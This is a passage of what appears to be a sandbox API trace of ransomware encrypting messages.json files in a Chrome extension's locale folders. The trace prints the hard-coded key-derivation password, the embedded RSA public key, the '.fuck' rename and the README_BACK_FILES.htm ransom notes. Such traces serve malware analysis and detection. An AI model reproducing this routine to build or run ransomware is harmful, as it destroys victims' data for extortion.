lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0248.187] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.187] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.188] CloseHandle (hObject=0x5d5c) returned 1 [0248.188] CloseHandle (hObject=0x5d58) returned 1 [0248.189] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0248.192] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0248.193] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.gsg")) returned 1 [0248.195] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.fuck")) returned 1 [0248.196] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.196] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.196] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.196] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.196] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.196] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0248.196] AreFileApisANSI () returned 1 [0248.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.197] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.197] GetFileType (hFile=0x5d50) returned 0x1 [0248.197] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.198] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.198] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.199] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.199] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.199] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.199] GetLastError () returned 0x0 [0248.200] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json")) returned 0x20 [0248.200] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0248.200] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.201] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.201] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.202] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.204] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.204] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.204] CryptHashData (hHash=0x29387f8, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.204] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.204] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.204] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.204] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b038) returned 1 [0248.205] CryptImportPublicKeyInfo (in: hCryptProv=0x293b038, dwCertEncodingType=0x1, pInfo=0x292eb70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292eba0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292eba8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937078) returned 1 [0248.205] CryptEncrypt (in: hKey=0x2937078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.205] CryptEncrypt (in: hKey=0x2937078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b588*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b588*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.205] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293b588*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b588*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.206] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xec, lpOverlapped=0x0) returned 1 [0248.208] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xec, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.208] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.208] CloseHandle (hObject=0x5d58) returned 1 [0248.208] CloseHandle (hObject=0x5d5c) returned 1 [0248.209] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0248.213] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0248.213] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0248.215] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0248.216] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.216] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.216] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.216] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.216] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.217] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0248.217] AreFileApisANSI () returned 1 [0248.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.217] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.217] GetFileType (hFile=0x5d50) returned 0x1 [0248.218] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.219] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.219] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.219] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.219] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.219] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.219] GetLastError () returned 0x0 [0248.219] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json")) returned 0x20 [0248.220] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0248.220] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.220] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.222] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.222] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.225] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.225] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.225] CryptHashData (hHash=0x2938978, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.225] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0248.226] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.226] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.226] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293af28) returned 1 [0248.226] CryptImportPublicKeyInfo (in: hCryptProv=0x293af28, dwCertEncodingType=0x1, pInfo=0x292ec40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292ec70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292ec78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29370b8) returned 1 [0248.226] CryptEncrypt (in: hKey=0x29370b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.226] CryptEncrypt (in: hKey=0x29370b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293afb0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293afb0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.226] WriteFile (in: hFile=0x5d58, lpBuffer=0x293afb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293afb0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.228] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe6, lpOverlapped=0x0) returned 1 [0248.229] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.229] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.229] CloseHandle (hObject=0x5d5c) returned 1 [0248.229] CloseHandle (hObject=0x5d58) returned 1 [0248.230] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0248.233] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0248.234] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0248.235] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0248.236] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.236] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.236] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.236] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.236] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.237] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0248.237] 